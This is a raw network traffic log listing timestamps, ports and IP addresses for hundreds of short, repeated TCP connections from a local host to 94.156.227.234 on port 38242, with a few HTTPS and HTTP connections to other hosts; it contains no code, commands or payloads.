Dec 27, 2024 09:22:02.430243015 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:02.810307980 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:02.972343922 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:03.472060919 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:03.472121000 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:03.811086893 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:03.930754900 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:03.930865049 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:03.930910110 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:04.050560951 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:04.434077978 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:04.606133938 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:05.088155031 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:05.088253021 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:05.435017109 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:05.554619074 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:05.554718018 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:05.554763079 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:05.674282074 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:06.059071064 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:06.220427990 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:06.717917919 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:06.717993975 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:07.060295105 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:07.179862976 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:07.179974079 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:07.180007935 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:07.299494028 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:07.684731007 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:07.844432116 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:08.428086042 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:08.428152084 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:08.685682058 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:08.805347919 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:08.805455923 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:08.805502892 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:08.924958944 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:09.311630011 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:09.472366095 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:09.932168007 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:09.932244062 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:10.312746048 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:10.432250977 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:10.432334900 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:10.432491064 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:10.551980019 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:10.875927925 CET	42836	443	192.168.2.23	91.189.91.43
Dec 27, 2024 09:22:10.936170101 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:11.096381903 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:11.635714054 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:11.635782957 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:11.937407970 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:12.465174913 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:12.465240955 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:12.465307951 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:12.585937023 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:12.969293118 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:13.132658958 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:13.649820089 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:13.649889946 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:13.970166922 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:14.089864969 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:14.089942932 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:14.089975119 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:14.209599972 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:14.593866110 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:14.756447077 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:15.271549940 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:15.271687984 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:15.595495939 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:15.714950085 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:15.715018034 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:15.715073109 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:15.834839106 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:16.218230009 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:16.380721092 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:16.871026039 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:16.871090889 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:17.019159079 CET	42516	80	192.168.2.23	109.202.202.202
Dec 27, 2024 09:22:17.219466925 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:17.338970900 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:17.339051962 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:17.339102983 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:17.458592892 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:17.847455978 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:18.008414984 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:18.495642900 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:18.495713949 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:18.849850893 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:18.969443083 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:18.969553947 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:18.969600916 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:19.089236021 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:19.478455067 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:19.640347958 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:20.120976925 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:20.121042967 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:20.479362965 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:20.599603891 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:20.599701881 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:20.599749088 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:20.719382048 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:21.103549957 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:21.264586926 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:21.807188988 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:21.807265043 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:22.104393005 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:22.223977089 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:22.224059105 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:22.224098921 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:22.343564987 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:22.727484941 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:22.888432026 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:23.387129068 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:23.387228966 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:23.728574038 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:23.848077059 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:23.848150015 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:23.848186970 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:23.967664003 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:24.352129936 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:24.512383938 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:25.005348921 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:25.005419016 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:25.353101015 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:25.472690105 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:25.472786903 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:25.472862005 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:25.592334986 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:25.976694107 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:26.137166023 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:26.600050926 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:26.600136995 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:26.977565050 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:27.097163916 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:27.097232103 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:27.097296953 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:27.216854095 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:27.601176023 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:27.764425993 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:28.216751099 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:28.216839075 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:28.602193117 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:28.721699953 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:28.721777916 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:28.721883059 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:28.841242075 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:29.226526022 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:29.388554096 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:29.919742107 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:29.919841051 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:30.227890015 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:30.347486973 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:30.347560883 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:30.347629070 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:30.467255116 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:30.852813005 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:31.012444019 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:31.564418077 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:31.564486027 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:31.853727102 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:31.973396063 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:31.973542929 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:31.973592043 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:32.093339920 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:32.477469921 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:32.644591093 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:33.122901917 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:33.122972012 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:33.478450060 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:33.598120928 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:33.598221064 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:33.598263025 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:33.717837095 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:34.103298903 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:34.264929056 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:34.828033924 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:34.828119040 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:35.104574919 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:35.224975109 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:35.225147009 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:35.225181103 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:35.346126080 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:35.729656935 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:35.892496109 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:36.407104969 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:36.407238007 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:36.730730057 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:36.850361109 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:36.850513935 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:36.850615025 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:36.970096111 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:37.356515884 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:37.516592979 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:38.059566021 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:38.059664965 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:38.358359098 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:38.477932930 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:38.478241920 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:38.478241920 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:38.597898006 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:38.983371019 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:39.144488096 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:39.631453991 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:39.631823063 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:39.985354900 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:40.104981899 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:40.105056047 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:40.105216980 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:40.224693060 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:40.611381054 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:40.772542953 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:41.270311117 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:41.270539999 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:41.591759920 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:22:41.612927914 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:41.732630968 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:41.732714891 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:41.732775927 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:41.852483034 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:42.237303019 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:42.400568962 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:42.889666080 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:42.889826059 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:43.238512993 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:43.358201981 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:43.358278036 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:43.358319044 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:43.478226900 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:43.862025023 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:44.024481058 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:44.685700893 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:44.685878992 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:44.863245964 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:44.982784033 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:44.982887030 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:44.982924938 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:45.102404118 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:45.487095118 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:45.648547888 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:46.202956915 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:46.203093052 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:46.488272905 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:46.607846022 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:46.607976913 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:46.608089924 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:46.727546930 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:47.115335941 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:47.277245998 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:47.754573107 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:47.754710913 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:48.117013931 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:48.236831903 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:48.236959934 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:48.237063885 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:48.356585026 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:48.742772102 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:48.904647112 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:49.372298956 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:49.372437000 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:49.744441986 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:49.865200996 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:49.865381956 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:49.865448952 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:49.984992981 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:50.372071981 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:50.532608032 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:51.007077932 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:51.007164001 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:51.373306990 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:51.493012905 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:51.493112087 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:51.493161917 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:51.612767935 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:51.998985052 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:52.160527945 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:52.624202013 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:52.624347925 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:53.000247002 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:53.120107889 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:53.120206118 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:53.120322943 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:53.239976883 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:53.626617908 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:53.788616896 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:54.258446932 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:54.258549929 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:54.627887011 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:54.747576952 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:54.747690916 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:54.747787952 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:54.867196083 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:55.254203081 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:55.416557074 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:55.926507950 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:55.926610947 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:56.255752087 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:56.376830101 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:56.376986027 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:56.377048016 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:56.496722937 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:56.882987976 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:57.045600891 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:57.586220980 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:57.586370945 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:57.883922100 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:58.003607035 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:58.003681898 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:58.003753901 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:58.123439074 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:58.509394884 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:58.678143024 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:59.201623917 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:59.201905966 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:59.510776043 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:59.630541086 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:59.630685091 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:59.630811930 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:59.750380039 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:00.136116982 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:00.296741962 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:00.791692972 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:00.791810989 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:01.137696028 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:01.257494926 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:01.257586956 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:01.257725000 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:01.377456903 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:01.763613939 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:01.928627968 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:02.068871021 CET	42836	443	192.168.2.23	91.189.91.43
Dec 27, 2024 09:23:02.474256039 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:02.474374056 CET	60124	38242	192.168.2.23	94.156.227.234
